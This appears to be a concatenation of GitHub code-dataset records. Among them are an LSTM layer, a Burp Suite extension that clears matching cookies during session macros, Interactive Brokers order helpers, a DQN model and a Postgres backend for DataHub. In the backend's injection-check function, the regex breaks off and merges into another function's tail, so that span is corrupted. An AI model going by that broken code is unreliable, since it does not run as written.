c_\n        current_hidden_state = o * tf.nn.tanh(c)\n\n        return tf.stack([current_hidden_state, c])\n    \n    def output(self, state_hidden):\n        output = tf.nn.relu(tf.matmul(state_hidden, self.W_ol) + self.b_ol) #shape (size_seq, size_batch, nodes_out)\n        return output\n    \n    def forward(self, X, training=True):\n        \n        self._inputs = X #shape (batch, size_seq, self.nodes_in)\n        
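# Build an all-zeros initial hidden state with the right batch dimension:\n        # take timestep 0 (shape: batch x nodes_in) and multiply it by a zeros\n        # matrix of shape (nodes_in, units_hidden).\n        initial_hidden = self._inputs[:, 0, :]\n        initial_hidden = 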
tf.matmul(initial_hidden, \n tf.zeros([self.nodes_in, self.units_hidden], dtype=tf.dtypes.float32))\n self.initial_hidden_c = tf.stack([initial_hidden, initial_hidden])\n # transforming to shape (size_seq, size_batch, nodes_in) for scan function\n self.input_scan = tf.transpose(self._inputs, perm=[1, 0, 2])\n \n all_hidden_states = tf.scan(self.forward_onestep, self.input_scan, \n initializer=self.initial_hidden_c, \n name='states') #shape (size_seq, 2, size_batch, units_hidden)\n \n all_hidden_states = all_hidden_states[:, 0, :, :] #shape (size_seq, size_batch, units_hidden)\n \n outputs = tf.map_fn(self.output, all_hidden_states) #shape (size_seq, size_batch, nodes_out)\n \n return tf.transpose(outputs[-self.n_pred:], perm=[1,0,2]) #just output of the last\n\n","repo_name":"DominikSpringer/LSTM","sub_path":"lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"48124104776","text":"import tkinter\nimport threading\nclass MyTkApp(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.start()\n def callback(self):\n self.root.quit()\n def run(self):\n self.root=tkinter.Tk()\n self.root.protocol(\"WM_DELETE_WINDOW\", self.callback)\n self.s = tkinter.StringVar()\n self.s.set('Foo')\n l = tkinter.Label(self.root,textvariable=self.s)\n l.pack()\n self.root.mainloop()\napp = MyTkApp()\nprint ('now can continue running code while mainloop runs')\n","repo_name":"apdaza/universidad-ejercicios","sub_path":"python/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"34084639650","text":"\"\"\"\n\n\"\"\"\n\nfrom . import values\nfrom . 
import plog\nfrom typing import Any\n\nlog = plog.DEFAULT_LOG\n\n\nclass PermissionGroup:\n    __user_list: list[str]\n\n    def __init__(self, name: str, p: int = values.DEFAULT_P):\n        \"\"\"\n        Root class used by pbot to describe a permission group.\n        :param p: permission value; at least 1 and at most the value defined by _pbot.__values.MAX_P.\n        \"\"\"\n        plog.DEFAULT_LOG.info(f\"PermissionGroup init start (Name:{type(self).__name__})\")\n        values.pg_list.append(self)\n        self.__user_list = []\n        self.__p = p\n        self.name = name\n\n    def __del__(self):\n        if self in values.pg_list:\n            values.pg_list.remove(self)\n        plog.DEFAULT_LOG.info(f\"{self.name} unloaded\")\n\n    @log.catch(level=\"WARNING\")\n    def set_p(self, p: int) -> bool:\n        \"\"\"\n        Set the group's permission level.\n        :param p: permission value\n        :return: bool describing whether the change succeeded\n        \"\"\"\n        plog.DEFAULT_LOG.info(f\"{self.name}: setting permission {p}\")\n        if not isinstance(p, int):\n            plog.DEFAULT_LOG.warning(f\"{p} is not an integer\")\n            return False\n        if p < 1 or p > values.MAX_P:\n            plog.DEFAULT_LOG.warning(f\"{p} is not a usable value\")\n            return False\n        self.__p = p\n        plog.DEFAULT_LOG.success(f\"Permission of {self.name} set to {self.__p}\")\n        return True\n\n    def get_p(self) -> int:\n        \"\"\"\n        Get the group's permission level.\n        :return: the permission value\n        \"\"\"\n        return self.__p\n\n    @log.catch(level=\"WARNING\")\n    def add_user(self, user_id: str) -> bool:\n        \"\"\"\n        Add a user to the permission group.\n        :param user_id: user id\n        :return: bool describing whether it succeeded\n        \"\"\"\n        plog.DEFAULT_LOG.info(f\"Adding user {user_id}\")\n        if user_id in self.__user_list:\n            plog.DEFAULT_LOG.warning(\"User was already added\")\n            return False\n        self.__user_list.append(str(user_id))\n        plog.DEFAULT_LOG.success(\"User added\")\n        return True\n\n    def del_user(self, user_id: str) -> bool:\n        \"\"\"\n        Remove a user from the permission group.\n        :param user_id: user id\n        :return: bool describing whether it succeeded\n        \"\"\"\n        plog.DEFAULT_LOG.info(f\"Removing user {user_id}\")\n        if user_id in self.__user_list:\n            self.__user_list.remove(user_id)\n            plog.DEFAULT_LOG.success(f\"User {user_id} removed\")\n            return True\n        else:\n            plog.DEFAULT_LOG.warning(f\"User {user_id} not found\")\n            return False\n\n    def find_user(self, user_id: str) -> bool:\n        \"\"\"\n        Look up a user in the permission group.\n        :param user_id: user id\n        :return: bool\n        \"\"\"\n        plog.DEFAULT_LOG.info(f\"Searching for user {user_id}\")\n        if user_id in self.__user_list:\n            plog.DEFAULT_LOG.success(f\"User {user_id} found\")\n            return True\n        else:\n            plog.DEFAULT_LOG.warning(f\"User {user_id} not found\")\n            return False\n\n    def get_users(self) -> list:\n        return self.__user_list\n\n    def save(self) -> dict[str, Any]:\n        \"\"\"\n        Serialize the permission group.\n        :return: dict holding this group's data\n        \"\"\"\n        data = {\n            \"Type\": \"PermissionGroup\",\n            \"Name\": self.name,\n            \"Permission\": self.__p,\n            \"Users\": self.__user_list,\n        }\n        return data\n\n    @log.catch(level=\"WARNING\")\n    def load(self, data: dict[str, Any]) -> bool:\n        \"\"\"\n        Load permission group data.\n        :param data: dict produced by save()\n        :return: bool\n        \"\"\"\n        log.info(f\"{self.name}: loading config\\n{data}\")\n        if data[\"Type\"] != \"PermissionGroup\":\n            log.warning(\"Unsupported data\")\n            return False\n        self.name = data[\"Name\"]\n        self.__p = data[\"Permission\"]\n        self.__user_list = data[\"Users\"]\n        log.success(\"Loaded successfully\")\n        return True\n\n\nclass EventClass:\n    __hooks: dict[str, Any]\n\n    def __init__(self, name: str):\n        \"\"\"\n        Base class describing every pbot event.\n        :param name: event name\n        \"\"\"\n        log.info(f\"Creating event {name}\")\n        self.__hooks = {}\n        self.name = name\n\n    @classmethod\n    @log.catch(level=\"WARNING\")\n    def __remind(cls, hook, **kwargs):\n        \"\"\"\n        Internal implementation for invoking a hook.\n        :param hook: hook callable\n        :param kwargs: arguments\n        \"\"\"\n        hook(**kwargs)\n\n    @log.catch(level=\"WARNING\")\n    def add_hook(self, hook: Any, name: str):\n        \"\"\"\n        Register a hook.\n        :param name: hook name, also used as the lookup key\n        :param hook: hook callable\n        \"\"\"\n        log.info(f\"Event {self.name}: adding hook {name}\")\n        self.__hooks[name] = hook\n\n    @log.catch(level=\"WARNING\")\n    def 
del_hook(self, name: str) -> Any:\n        \"\"\"\n        Remove a hook.\n        :param name: hook name\n        :return: the removed hook callable\n        \"\"\"\n        log.info(f\"Event {self.name}: removing hook {name}\")\n        if name in self.__hooks:\n            _ = self.__hooks[name]\n            del self.__hooks[name]\n            log.success(f\"Event {self.name}: hook {name} removed\")\n            return _\n        else:\n            log.warning(f\"Event {self.name}: hook {name} not found\")\n\n    def remind_hooks(self, **kwargs) -> None:\n        \"\"\"\n        Invoke every registered hook.\n        :param kwargs: arguments forwarded to each hook\n        \"\"\"\n        log.info(\"Invoking hooks\")\n        for i, y in self.__hooks.items():\n            log.info(f\"Event {self.name}: invoking hook {i}\")\n            self.__remind(y, **kwargs)\n","repo_name":"hiyms/pbot","sub_path":"_pbot/pbot_cl.py","file_name":"pbot_cl.py","file_ext":"py","file_size_in_byte":5697,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4634323279","text":"command = input()\nbalance = 0\n\nwhile command != \"NoMoreMoney\":\n    command = float(command)\n\n    if command < 0:\n        print(\"Invalid operation!\")\n        break\n\n    balance += command\n    print(f\"Increase: {command:.2f}\")\n    command = input()\n\nprint(f\"Total: {balance:.2f}\")\n","repo_name":"4um3n/SoftUni-Courses","sub_path":"Programing-Basics-With-Python/0-4-While-Loops/Lab/acount_balace.py","file_name":"acount_balace.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"24706810071","text":"import expr\n\nclass operationMixin:\n    @staticmethod\n    def add(left, right):\n        if left == 0:\n            return right\n        if right == 0:\n            return left\n\n        return expr.ExprTree(left, \"+\", right)\n\n    @staticmethod\n    def mul(left, right):\n        if left == 0:\n            return 0\n        if right == 0:\n            return 0\n\n        if left == 1:\n            return right\n        if right == 1:\n            return left\n\n        return expr.ExprTree(left, \"*\", right)\n\n    @staticmethod\n    def pow(base, exp):\n        if exp == 0:\n            return 1\n        if base == 0:\n            return 0\n        if exp == 1:\n            return base\n        if base == 1:\n            return 1\n        \n        if expr.isTree(base):\n            if base.oper == \"^\":\n                return expr.ExprTree(base.node1, \"^\", (base.node2 * exp))\n\n        return expr.ExprTree(base, \"^\", exp)\n","repo_name":"TimothySamson/pygebra","sub_path":"operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20670077639","text":"\"\"\"\r\nBy: InfoSecV9Y\r\nPurpose: This script deletes cookies matching the configured regex patterns from the Burp Cookie Jar.\r\nPre-Conditions: This script needs to run as a Macro using Session Handling rules.\r\nVersion: 0.3\r\nLast modified: 2021.Oct.18 08:00 PM\r\nKnown Bugs:\r\nUp to 0.2: re.IGNORECASE is not available\r\n\r\nPending Enhancements:\r\n\r\nUpdates:\r\n0.3: Trying to avoid deleting the cookies just set by the macro (optimising)\r\n0.2: Multiple regex patterns can be added\r\n0.1: Pattern based cookie will be removed for only one pattern at a time\r\n\r\nRef:\r\n    This script source was from:\r\n    Script Source:\r\n    1.https://gist.github.com/ryan-wendel/ec69e77dcac6410f6535d6f9278eabf7\r\n    2.https://github.com/HannahLaw-Portswigger/DeleteCookies\r\n    Blog: https://www.ryanwendel.com/2019/09/27/application-enumeration-tips-using-aquatone-and-burp-suite/\r\n    3.https://github.com/justm0rph3u5/BurpSuite-CustomHeader\r\n    Blog: https://justm0rph3u5.medium.com/automating-burp-suite-4-understanding-and-customising-custom-header-from-response-via-burp-macro-214332dda012\r\n\r\n\r\n    Portswigger response:\r\n    
https://forum.portswigger.net/thread/macro-clear-cookie-jar-1ee87e563ac65\r\n    https://forum.portswigger.net/thread/emptying-cookie-jar-with-new-session-15ed127d\r\n\r\n    Combining regexp patterns: https://stackoverflow.com/questions/3040716/python-elegant-way-to-check-if-at-least-one-regex-in-list-matches-a-string/47017995\r\n\"\"\"\r\n# python imports\r\nimport re\r\nimport sys\r\n\r\n# Burp specific imports\r\nfrom burp import IBurpExtender\r\nfrom burp import ISessionHandlingAction\r\nfrom burp import ICookie\r\nimport datetime\r\n\r\n# For using the debugging tools from\r\n# https://github.com/securityMB/burp-exceptions\r\ntry:\r\n    from exceptions_fix import FixBurpExceptions\r\nexcept ImportError:\r\n    pass\r\n\r\n\r\nclass Cookie(ICookie):\r\n\r\n    def getDomain(self):\r\n        return self.cookie_domain\r\n\r\n    def getPath(self):\r\n        return self.cookie_path\r\n\r\n    def getExpiration(self):\r\n        return self.cookie_expiration\r\n\r\n    def getName(self):\r\n        return self.cookie_name\r\n\r\n    def getValue(self):\r\n        return self.cookie_value\r\n\r\n    def __init__(self, cookie_domain=None, cookie_name=None, cookie_value=None, cookie_path=None,\r\n                 cookie_expiration=None):\r\n        self.cookie_domain = cookie_domain\r\n        self.cookie_name = cookie_name\r\n        self.cookie_value = cookie_value\r\n        self.cookie_path = cookie_path\r\n        self.cookie_expiration = cookie_expiration\r\n\r\n\r\nclass BurpExtender(IBurpExtender, ISessionHandlingAction):\r\n    #\r\n    # Define config and gui variables\r\n    #\r\n    cookieName = 'jwt'\r\n    cookieDomain = 'dummy.com'\r\n    pattern = [\".AspNetCore.Correlation.OpenIdConnect*\",\".AspNetCore.OpenIdConnect.Nonce*\"] #['__Host-*', 'NID*']\r\n    cookie_name_list = ['.AspNetCore.Correlation.OpenIdConnect', '.AspNetCore.OpenIdConnect.Nonce.']\r\n    domain_list_to_consider = ['\\\\', '\\\\temp']\r\n    domain_list_to_ignore = ['\\\\', '\\\\temp']\r\n\r\n    combined = \"(\" + \")|(\".join(pattern) + \")\" # Make a regex that matches if any of our regexes match.\r\n\r\n    #\r\n    # Define some cookie functions\r\n    #\r\n    # Below function is to remove all matched cookies from cookie jar based on RegEx\r\n    def deleteCookie(self):\r\n        cookies = self.callbacks.getCookieJarContents()\r\n        for cookie in cookies:\r\n            # self.stdout.println(\"%s = %s\" % (cookie.getName(), cookie.getValue()))\r\n            # if cookie.getDomain() == domain and cookie.getName() == name:\r\n            if re.match(self.combined, cookie.getName(), re.IGNORECASE):\r\n                cookie_to_be_nuked = Cookie(cookie.getDomain(), cookie.getName(), None, cookie.getPath(),\r\n                                            cookie.getExpiration())\r\n                self.callbacks.updateCookieJar(cookie_to_be_nuked)\r\n                print(\"[\" + datetime.datetime.now().strftime(\r\n                    \"%Y-%m-%d %H:%M:%S\") + \"] Cookie '\" + cookie.getName() + \"' nuked for pattern: \" + self.combined)\r\n\r\n    # Below function is to remove the matched cookies from cookie jar while ignoring the cookies received from the macro/sessionhandling\r\n    def deleteCookieFromMacro(self, cookie_whitelist):\r\n        cookies = self.callbacks.getCookieJarContents()\r\n        for cookie in cookies:\r\n\r\n            #use the following condition to skip the validations based on cookie domain name\r\n\r\n            #if cookie.getDomain() not in self.domain_list_to_consider: # Whitelist to scan\r\n            if cookie.getDomain() in self.domain_list_to_ignore: # Blacklist to ignore\r\n                continue\r\n\r\n            for cookie_name in self.cookie_name_list:\r\n                print(\"7.Cookie Name: \" + cookie.getName() + \"\\t cookie_name: \"+cookie_name)\r\n                if cookie_name in cookie.getName():\r\n                    #Cookie present in the Burp Cookie Jar\r\n                    if 
cookie.getName() not in cookie_whitelist:\r\n cookie_to_be_nuked = Cookie(cookie.getDomain(), cookie.getName(), None, cookie.getPath(),\r\n cookie.getExpiration())\r\n self.callbacks.updateCookieJar(cookie_to_be_nuked)\r\n print(\"[\" + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\") + \"] Cookie nuked: \" + cookie.getName())\r\n\r\n else:\r\n print(\"[\" + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\") + \"] Whitelisted cookie detected: \" + cookie.getName())\r\n #for whitelisted_cookie in cookie_whitelist:\r\n # self.stdout.println(\"%s = %s\" % (cookie.getName(), cookie.getValue()))\r\n # if cookie.getDomain() == domain and cookie.getName() == name:\r\n #if cookie.getName() != whitelisted_cookie:\r\n\r\n\r\n # Below code is to match based on RegEx\r\n # if re.match(self.combined, cookie.getName(), re.IGNORECASE):\r\n # cookie_to_be_nuked = Cookie(cookie.getDomain(), cookie.getName(), None, cookie.getPath(),\r\n # cookie.getExpiration())\r\n # print(\"[\" + datetime.datetime.now().strftime(\r\n # \"%Y-%m-%d %H:%M:%S\") + \"] Cookie '\" + cookie.getName() + \"' nuked for pattern: \" + self.combined)\r\n\r\n\r\n #\r\n # implement IBurpExtender\r\n #\r\n def registerExtenderCallbacks(self, callbacks):\r\n # keep a reference to our callbacks object\r\n self.callbacks = callbacks\r\n\r\n # obtain an extension helpers object\r\n self.helpers = callbacks.getHelpers()\r\n\r\n # set our extension name\r\n callbacks.setExtensionName(\"V9Y - Remove matched cookies - Macro analysis\")\r\n\r\n # register ourselves a Session Handling Action\r\n callbacks.registerSessionHandlingAction(self)\r\n\r\n # Used by the custom debugging tools\r\n sys.stdout = callbacks.getStdout()\r\n\r\n print(\"DEBUG: V9Y - V9Y - Remove matched cookies - Macro analysis - Enabled!\")\r\n\r\n return\r\n\r\n #\r\n # Implement ISessionHandlingAction\r\n #\r\n def getActionName(self):\r\n return \"V9Y - Remove matched cookies - Macro analysis\"\r\n\r\n def performAction(self, current_request, macro_items):\r\n\r\n # self.deleteCookie()\r\n # return\r\n cookie_whitelist = [] # This is to get the list of latest cookies retrieved from macros/session handling rules\r\n print(\"1.Looking for list of macros \")\r\n if len(macro_items) >= 0:\r\n print(\"2.Macro list is >= 0 \\t\\t len(macro_items) >= 0\")\r\n macro_response_info = self.helpers.analyzeResponse(macro_items[0].getResponse())\r\n # get the list of headers from the response, if token is present in the response header then we need to list all the header and extract the value\r\n macro_body_offset = macro_response_info.getHeaders()\r\n\r\n # from the macro body(which contains the response headers), we are extracting dynamic value of the header\r\n new_header = macro_body_offset.get(1)[14:]\r\n\r\n # To list all the headers and iterate one by one to\r\n headers = macro_response_info.getCookies()\r\n head_delete = ''\r\n print(\"3.Going to look for all cookies\")\r\n\r\n for header in headers:\r\n print(\"4.Cookie is: \" + str(header.getName()))\r\n for cookie_name in self.cookie_name_list:\r\n if cookie_name in str(header.getName()):\r\n print(\"5.Value found:\" + cookie_name + \". Adding this cookie to the white list\")\r\n cookie_whitelist.append(str(header.getName()))\r\n # head_delete = header\r\n print(\"6.Cookie enumeration completed. 
Going to nuke the cookie from cookie jar\")\r\n        else:\r\n            print(\"The macro list is empty hence removing all matched cookies from cookie jar\")\r\n\r\n        self.deleteCookieFromMacro(cookie_whitelist)\r\n\r\n\r\n        return\r\n        # Below is the actual code and above is the custom code\r\n        if len(macro_items) >= 0:\r\n            # grab some stuff from the current request\r\n            req_text = self.helpers.bytesToString(current_request.getRequest())\r\n\r\n            current_macro = macro_items[0]\r\n            macro_resp = current_macro.getResponse()\r\n            macro_resp_info = self.helpers.analyzeResponse(macro_resp)\r\n\r\n            # parse the response & search for jwt\r\n            if macro_resp:\r\n                macro_resp_body = macro_resp[macro_resp_info.getBodyOffset():]\r\n                macro_resp_text = self.helpers.bytesToString(macro_resp_body)\r\n                search_re = '\"%s\":\"(.*?)\"' % self.cookieName\r\n                search = re.search(search_re, macro_resp_text, re.IGNORECASE)\r\n\r\n                # we have a jwt in the macro response\r\n                if search:\r\n                    jwt = search.group(1)\r\n\r\n                    # set the cookie value in the cookie jar\r\n                    self.createCookie(self.cookieDomain, self.cookieName, jwt)\r\n\r\n                    # replace the old token with the stored value\r\n                    header_replace = \"%s: %s\" % (self.cookieName, jwt)\r\n                    req_text = re.sub(r\"\\r\\n\" + self.cookieName + \": .*\\r\\n\", \"\\r\\n\" + header_replace + \"\\r\\n\",\r\n                                      req_text)\r\n\r\n                    # set the current request\r\n                    current_request.setRequest(self.helpers.stringToBytes(req_text))\r\n\r\n\r\ntry:\r\n    FixBurpExceptions()\r\nexcept:\r\n    pass\r\n","repo_name":"V9Y1nf0S3C/BurpExtension-DeleteCookies","sub_path":"DeleteCookies_from_list v0.3.py","file_name":"DeleteCookies_from_list v0.3.py","file_ext":"py","file_size_in_byte":10754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31821588429","text":"nb = [5, 3, 1, 5, 4, 4, 2, 3]\n\n\"\"\"We are going to turn this list into a 'set'. A set is a built-in data type, just like lists or tuples.\nA 'set' contains no duplicates and its elements are not indexed. 
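For example, with the list above, set(nb) == {1, 2, 3, 4, 5}. 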
Elements are treated as unordered, and a 'set' itself cannot be sorted.\n\"\"\"\nvalues_set = set(nb)  # values_set == {1, 2, 3, 4, 5}\n\n# Now that the duplicates are gone, back to a list...\nvalues_list = list(values_set)\n\nvalues_list.sort()\n\nprint(\"Initial list >>>\", nb)\nprint(\"Deduplicated, sorted list >>>\", values_list)\n","repo_name":"Louis-Gabriel-TM/wf3_poo_en_python","sub_path":"ch10_tp_datatypes/2_tp_lists/exo_10.31alt.py","file_name":"exo_10.31alt.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38364771214","text":"from ibapi.contract import Contract\nfrom ibapi.order import Order\n\n\ndef wse_stock(symbol: str):\n    contract = Contract()\n    contract.symbol = symbol\n    contract.secType = \"STK\"\n    contract.exchange = \"WSE\"\n    return contract\n\n\ndef nyse_stock(symbol: str):\n    contract = Contract()\n    contract.symbol = symbol\n    contract.secType = \"STK\"\n    contract.exchange = \"NYSE\"\n    return contract\n\n\ndef market_order(action: str, quantity: float):\n    order = Order()\n    order.action = action\n    order.orderType = \"MKT\"\n    order.totalQuantity = quantity\n    return order\n\n\ndef stop_order(action: str, quantity: float, stop_price: float):\n    order = Order()\n    order.action = action\n    order.orderType = \"STP\"\n    order.totalQuantity = quantity\n    order.tif = \"GTC\"\n    order.auxPrice = stop_price\n    return order\n","repo_name":"quarkfin/qf-lib","sub_path":"qf_lib/brokers/ib_broker/ib_utils.py","file_name":"ib_utils.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":396,"dataset":"github-code","pt":"77"} +{"seq_id":"13235070970","text":"import torch\nimport torch.nn as nn\n\nimport numpy as np\n\n\nclass DQN(nn.Module):\n    def __init__(self, input_shape, num_actions):\n        super(DQN, self).__init__()\n\n        # Convolution layer\n        self.conv_layers = nn.Sequential(\n            nn.Conv2d(input_shape[0], 32, kernel_size=8, stride=4),\n            nn.ReLU(),\n            nn.Conv2d(32, 64, kernel_size=4, stride=2),\n            nn.ReLU(),\n            nn.Conv2d(64, 64, kernel_size=3, stride=1),\n            nn.ReLU()\n        )\n\n        # Compute output shape of layer to pass into fully connected layer\n        conv_out_size = self._get_conv_out(input_shape)\n        self.fc_layers = nn.Sequential(\n            nn.Linear(conv_out_size, 512),\n            nn.ReLU(),\n            nn.Linear(512, num_actions)\n        )\n\n    def _get_conv_out(self, shape):\n        out = self.conv_layers(torch.zeros(1, *shape))\n        return int(np.prod(out.size()))\n\n    def forward(self, inputs):\n        conv_out = self.conv_layers(inputs).view(inputs.size()[0], -1)\n        return self.fc_layers(conv_out)\n\n    def __call__(self, inputs):\n        return self.forward(inputs)\n","repo_name":"alik-git/Pong-DQN","sub_path":"utils/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"27547003459","text":"import re\nimport os\nimport errno\nimport shutil\nimport hashlib\nfrom collections import namedtuple\nfrom uuid import uuid4\nimport psycopg2\nimport core.db.query_rewriter\nfrom psycopg2.extensions import AsIs\nfrom psycopg2.pool import ThreadedConnectionPool\nfrom psycopg2 import errorcodes\nfrom core.db.licensemanager import LicenseManager\n\nfrom core.db.errors import PermissionDenied\nfrom config import settings\n\n\"\"\"\nDataHub internal APIs for postgres repo_base\n\"\"\"\nHOST = settings.DATABASES['default']['HOST']\nPORT = 5432\n\n
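# Allow settings to override the default Postgres port when one is configured.\nif 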
settings.DATABASES['default']['PORT'] != '':\n try:\n PORT = int(settings.DATABASES['default']['PORT'])\n except:\n pass\n\n# Maintain a separate db connection pool for each (user, password, database)\n# tuple.\nconnection_pools = {}\nPoolKey = namedtuple('PoolKey', 'user, password, repo_base')\n\n\ndef _pool_for_credentials(user, password, repo_base, create_if_missing=True):\n pool_key = PoolKey(user, password, repo_base)\n # Create a new pool if one doesn't exist or if the existing one has been\n # closed. Normally a pool should only be closed during testing, to force\n # all hanging connections to a database to be closed.\n if pool_key not in connection_pools or connection_pools[pool_key].closed:\n if create_if_missing is False:\n return None\n # Maintains at least 1 connection.\n # Raises \"PoolError: connection pool exausted\" if a thread tries\n # holding onto than 10 connections to a single database.\n connection_pools[pool_key] = ThreadedConnectionPool(\n 0,\n 10,\n user=user,\n password=password,\n host=HOST,\n port=PORT,\n database=repo_base)\n return connection_pools[pool_key]\n\n\ndef _close_all_connections(repo_base):\n for key, pool in connection_pools.iteritems():\n if repo_base == key.repo_base and not pool.closed:\n pool.closeall()\n\n\ndef _convert_pg_exception(e):\n # Convert some psycopg2 errors into exceptions meaningful to\n # Django.\n if (e.pgcode == errorcodes.INSUFFICIENT_PRIVILEGE):\n raise PermissionDenied()\n if (e.pgcode == errorcodes.INVALID_PARAMETER_VALUE or\n e.pgcode == errorcodes.UNDEFINED_OBJECT):\n raise ValueError(\"Invalid parameter in query.\")\n if e.pgcode == errorcodes.INVALID_SCHEMA_NAME:\n error = ('Repo not found. '\n 'You must specify a repo in your query. '\n 'i.e. select * from REPO_NAME.TABLE_NAME. 
')\n raise LookupError(error)\n if e.pgcode == errorcodes.UNDEFINED_TABLE:\n raise LookupError(\"Table or view not found.\")\n if e.pgcode == errorcodes.DUPLICATE_SCHEMA:\n raise ValueError(\"A repo with that name already exists.\")\n if e.pgcode == errorcodes.DUPLICATE_TABLE:\n raise ValueError(\"A table with that name already exists.\")\n raise e\n\n\nclass PGBackend:\n\n def __init__(self, user, password, host=HOST, port=PORT, repo_base=None):\n self.user = user\n self.password = password\n self.host = host\n self.port = port\n self.repo_base = repo_base\n self.connection = None\n\n # row level security is enabled unless the user is a superuser\n self.row_level_security = bool(\n user != settings.DATABASES['default']['USER'])\n\n # We only need a query rewriter if RLS is enabled\n if self.row_level_security:\n self.query_rewriter = core.db.query_rewriter.SQLQueryRewriter(\n self.repo_base, self.user)\n\n self.__open_connection__()\n\n def __del__(self):\n self.close_connection()\n\n def __open_connection__(self):\n pool = _pool_for_credentials(self.user, self.password, self.repo_base)\n self.connection = pool.getconn()\n self.connection.set_isolation_level(\n psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)\n\n def change_repo_base(self, repo_base):\n self.close_connection()\n self.repo_base = repo_base\n self.__open_connection__()\n\n def close_connection(self):\n pool = _pool_for_credentials(self.user, self.password, self.repo_base,\n create_if_missing=False)\n if self.connection and pool and not pool.closed:\n pool.putconn(self.connection, close=True)\n self.connection = None\n\n def _check_for_injections(self, noun):\n \"\"\"\n Raises ValueError if the proposed noun is invalid.\n\n Valid nouns contain only alphanumeric characters and underscores, and\n must not begin or end with an underscore.\n \"\"\"\n invalid_noun_msg = (\n \"Usernames and repo names may only contain \"\n \"alphanumeric characters and underscores, must begin with a \"\n \"letter, and must not begin or end with an underscore.\"\n )\n\n regex = r'^(?![\\_\\d])[\\w\\_]+(? 
0)\n\n    def database_exists(self, db_name):\n        query = \"SELECT 1 FROM pg_database WHERE datname=%s\"\n        params = (db_name,)\n        result = self.execute_sql(query, params)\n        return (result['row_count'] > 0)\n\n    def create_user(self, username, password, create_db=True):\n        self._check_for_injections(username)\n\n        query = ('CREATE ROLE %s WITH LOGIN '\n                 'NOCREATEDB NOCREATEROLE NOCREATEUSER PASSWORD %s')\n        params = (AsIs(username), password)\n        self.execute_sql(query, params)\n\n        # Don't do this in the case of the public user.\n        if username != settings.PUBLIC_ROLE:\n            query = ('GRANT %s to %s')\n            params = (AsIs(settings.PUBLIC_ROLE), AsIs(username))\n            self.execute_sql(query, params)\n\n        if create_db:\n            return self.create_user_database(username)\n\n    def create_user_database(self, username):\n        # lines need to be executed separately because\n        # \"CREATE DATABASE cannot be executed from a\n        # function or multi-command string\"\n        self._check_for_injections(username)\n\n        query = 'CREATE DATABASE %s; '\n        params = (AsIs(username),)\n        self.execute_sql(query, params)\n\n        query = 'ALTER DATABASE %s OWNER TO %s; '\n        params = (AsIs(username), AsIs(username))\n        return self.execute_sql(query, params)\n\n    def remove_user(self, username):\n        self._check_for_injections(username)\n\n        query = 'DROP ROLE %s;'\n        params = (AsIs(username),)\n        return self.execute_sql(query, params)\n\n    def drop_owned_by(self, username):\n        self._check_for_injections(username)\n        # Let psycopg2 substitute the placeholder; pre-formatting the query\n        # here would leave no placeholder for the params tuple.\n        query = 'DROP OWNED BY %s CASCADE;'\n        params = (AsIs(username), )\n        return self.execute_sql(query, params)\n\n    def list_all_users(self):\n        query = 'SELECT usename FROM pg_catalog.pg_user WHERE usename != %s'\n        params = (self.user,)\n        res = self.execute_sql(query, params)\n        user_tuples = res['tuples']\n\n        all_users_list = []\n        for user_tuple in user_tuples:\n            all_users_list.append(user_tuple[0])\n\n        return all_users_list\n\n    def list_all_databases(self):\n        query = ('SELECT datname FROM pg_database where datname NOT IN '\n                 ' (%s, \\'template1\\', \\'template0\\', '\n                 ' \\'datahub\\', \\'test_datahub\\', \\'postgres\\');'\n                 )\n        params = (self.user, )\n        res = self.execute_sql(query, params)\n        db_tuples = res['tuples']\n\n        all_db_list = []\n        for db_tuple in db_tuples:\n            all_db_list.append(db_tuple[0])\n\n        return all_db_list\n\n    def remove_database(self, database, revoke_collaborators=True):\n        self._check_for_injections(database)\n\n        # remove collaborator access to the database\n        if revoke_collaborators:\n            all_users = self.list_all_users()\n\n            for user in all_users:\n                query = \"REVOKE ALL ON DATABASE %s FROM %s;\"\n                params = (AsIs(database), AsIs(user))\n                self.execute_sql(query, params)\n\n        # Make sure to close all extant connections to this database or the\n        # drop will fail.\n        _close_all_connections(database)\n\n        # drop database\n        query = 'DROP DATABASE %s;'\n        params = (AsIs(database),)\n        try:\n            return self.execute_sql(query, params)\n        except psycopg2.ProgrammingError as e:\n            print(e)\n            print('this probably happened because the postgres role '\n                  'exists, but a database of the same name does not.')\n\n    def change_password(self, username, password):\n        self._check_for_injections(username)\n        query = 'ALTER ROLE %s WITH PASSWORD %s;'\n        params = (AsIs(username), password)\n        return self.execute_sql(query, params)\n\n    def list_collaborators(self, repo):\n        query = 'SELECT unnest(nspacl) FROM pg_namespace WHERE nspname=%s;'\n        params = (repo, )\n        res = self.execute_sql(query, params)\n\n        # postgres privileges\n        # r -- SELECT (\"read\")\n        # w -- UPDATE (\"write\")\n        # a -- 
